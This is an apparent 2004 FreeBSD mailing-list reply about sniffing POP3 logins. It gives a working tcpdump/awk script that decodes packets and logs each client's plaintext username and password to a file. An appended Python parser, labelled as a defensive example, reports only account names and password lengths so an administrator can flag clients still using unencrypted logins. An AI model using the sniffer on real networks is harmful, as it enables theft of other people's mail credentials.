tcpdump for sniffing POP3 -- methods ?
freebsd-lists at albury.net.au
Tue Apr 13 13:10:58 PDT 2004
On Tue, 13 Apr 2004, John Fox wrote:
> 2) Obtain them by sniffing the POP3 traffic being sent
> to the Imail server.
>
> I think #2 is the only possibility, and I haven't made much
> use of tcpdump, so while I do know how to run it and
> specify a host to listen to, I've no idea how to isolate
> the clear-text stuff (containing the usernames and passwords)
> from all the other traffic.
>
> Any suggestions would be greatly appreciated.
I had to do this some years back; here's the rude, crude and unattractive
script I wrote then:
# cat sniff.pop.passwords
#! /bin/sh
log=sniffed.passwords.log
mailhost="mail" # Hostname of whichever host receives your incoming mail
# -l line-buffered, -n no name lookups, -x hex dump, -s 256 enough of each
# packet to hold a POP3 command line. Expects the old tcpdump -x layout:
# one "src > dst" header line, then bare lines of eight 16-bit hex words.
tcpdump -lnx -s 256 dst port 110 and host $mailhost 2>/dev/null | awk '
BEGIN{ lut="123456789abcdef" }   # index(lut,ch) maps a hex digit to its value
/>/ { IP=$2; n=0; len=0; c=""; } # header line: remember client addr, reset state
{
# second word of the first hex line is the IP total length
if(n==1) for(x=1; x<=4; x++) len=len*16+index(lut,substr($2,x,1));
# payload starts at byte 40 (20-byte IP + 20-byte TCP, no options):
# word 5 of the third hex line, then every word of the lines after it
if(++n>3 && len>20)
{
for(i=(n==4)*4+1; i<=NF; i++)
c=sprintf("%s%c%c",c,
index(lut,substr($i,1,1))*16+index(lut,substr($i,2,1)),
index(lut,substr($i,3,1))*16+index(lut,substr($i,4,1)))
if(length(c) >= len-40)   # whole payload collected
{
sub("\\.[0-9]*$","",IP);  # strip the source port from a.b.c.d.port
v=substr(c,6); gsub("[^a-zA-Z0-9]","",v)
if(substr(c,1,5)=="USER ") usr[IP]=v;
if(substr(c,1,5)=="PASS " && usr[IP]) {
printf("%s %-16.16s %10s - %s\n", strftime("%d-%b-%Y %H:%M:%S"), IP, usr[IP], v);   # strftime needs gawk
usr[IP]=""
}
}
}
}'
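For anyone doing this today from the defensive side, here is an added example (mine, not the script above and not part of the original post) that does the same isolation on modern tcpdump -nx output, whose hex lines carry a 0x0010: offset prefix the awk above does not expect. It reads the IP header length and TCP data offset instead of assuming 40 header bytes, reassembles each client's command stream so a PASS split across two segments is still caught, and reports only the account and the password length, so the output tells you which clients still authenticate in the clear without itself becoming a password file. The capture text embedded in it is constructed, not real.

```python
import re
from collections import defaultdict
# Constructed `tcpdump -nx dst port 110` output (not a real capture): USER, then PASS split over two segments.
SAMPLE_DUMP = """\
13:10:58.100000 IP 172.16.10.99.49152 > 10.0.0.5.110: Flags [P.], seq 1:13, ack 1, win 502, length 12
\t0x0000:  4500 0034 1c46 4000 4006 0000 ac10 0a63
\t0x0010:  0a00 0005 c000 006e 0000 0001 0000 0001
\t0x0020:  5018 01f6 0000 0000 5553 4552 2061 6c69
\t0x0030:  6365 0d0a
13:10:58.200000 IP 172.16.10.99.49152 > 10.0.0.5.110: Flags [P.], seq 13:21, ack 1, win 502, length 8
\t0x0000:  4500 0030 1c47 4000 4006 0000 ac10 0a63
\t0x0010:  0a00 0005 c000 006e 0000 000d 0000 0001
\t0x0020:  5018 01f6 0000 0000 5041 5353 2068 756e
13:10:58.300000 IP 172.16.10.99.49152 > 10.0.0.5.110: Flags [P.], seq 21:27, ack 1, win 502, length 6
\t0x0000:  4500 002e 1c48 4000 4006 0000 ac10 0a63
\t0x0010:  0a00 0005 c000 006e 0000 0015 0000 0001
\t0x0020:  5018 01f6 0000 0000 7465 7232 0d0a
"""
HDR_RE = re.compile(r"IP (\d+\.\d+\.\d+\.\d+)\.(\d+) > ")   # client address and port on a header line

def tcp_payload(pkt):   # TCP payload of one IPv4 packet, reading IHL and data offset (not a fixed 40)
    ihl = (pkt[0] & 0x0F) * 4
    if pkt[9] != 6 or len(pkt) < ihl + 20:        # not TCP, or cut short by snaplen
        return b""
    doff = (pkt[ihl + 12] >> 4) * 4
    return pkt[ihl + doff:int.from_bytes(pkt[2:4], "big")]

def packets(dump_text):   # yields (client_ip, client_port, tcp_payload) per packet in the dump
    src, raw = None, bytearray()
    for line in dump_text.splitlines() + [""]:     # "" flushes the last packet
        if line.lstrip().startswith("0x"):          # hex line: "0x0010:  0a00 0005 ..."
            raw += bytes.fromhex(line.split(":", 1)[1].replace(" ", ""))
            continue
        if src and raw:                             # a header line (or EOF) ends the previous packet
            yield src.group(1), int(src.group(2)), tcp_payload(bytes(raw))
        src, raw = HDR_RE.search(line), bytearray()

def find_cleartext_logins(dump_text):   # USER/PASS pairs sent in the clear; password not retained
    streams, users, hits = defaultdict(bytes), {}, []   # keyed by (client ip, port)
    for ip, port, payload in packets(dump_text):
        streams[ip, port] += payload
        while b"\r\n" in streams[ip, port]:           # one POP3 command per CRLF
            line, _, streams[ip, port] = streams[ip, port].partition(b"\r\n")
            cmd, _, arg = line.decode("ascii", "replace").partition(" ")
            if cmd.upper() == "USER":
                users[ip, port] = arg
            elif cmd.upper() == "PASS":
                hits.append({"client": ip, "user": users.get((ip, port)), "password_len": len(arg)})
    return hits
```

Feed it a real dump with find_cleartext_logins(open("pop3.txt").read()); anything it returns is a client that should be moved to POP3 over TLS or APOP.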